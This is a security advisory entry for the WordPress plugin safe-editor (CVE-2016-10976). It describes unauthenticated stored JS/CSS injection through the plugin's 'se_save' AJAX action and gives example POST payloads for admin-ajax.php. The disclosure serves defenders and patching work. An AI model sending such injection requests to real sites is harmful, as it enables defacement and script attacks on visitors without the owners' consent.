Lucene search
Robert SætherWPEX-ID:070648AA-9928-425D-A189-9AE3481F3875HistoryMay 06, 2016 - 12:00 a.m.
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
2016-05-0600:00:00
Robert Sæther
8
EPSS
0.001
Percentile
40.7%
When saving JS/CSS in this plugin then both private and public ajax-hooks are being used. Because of this anyone can post JS/CSS that are saved to the db and printed to the head and footer portion of the page.
In the file "index.php" (in root folder) on line 188 and 189 you can see that both private and public ajax-hooks are called and is referencing to the function "se_save".
This function does not do any authentication check or string sanitizing. Therefore you can inject whatever you want where the "wp_footer" and "wp_head" is called. With the use of for example cUrl or the chromeapp Postman this can be exploited with ease.
Example:
URL: http://www.site.com/wp-admin/admin-ajax.php
(Postdata displayed in JSON)
# JS injection
{
type: 'js',
data: 'alert("Hello world!");',
action: 'se_save'
}
# CSS injection
{
type: 'css',
data: 'body { display: none !important; }',
action: 'se_save'
}Related
cve
cve
CVE-2016-10976
2019-09-17 15:15:11
nvd
nvd
CVE-2016-10976
2019-09-17 15:15:11
prion
prion
Authentication flaw
2019-09-17 15:15:00
cvelist
cvelist
CVE-2016-10976
2019-09-17 14:05:33
wpvulndb
wpvulndb
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
2016-05-06 00:00:00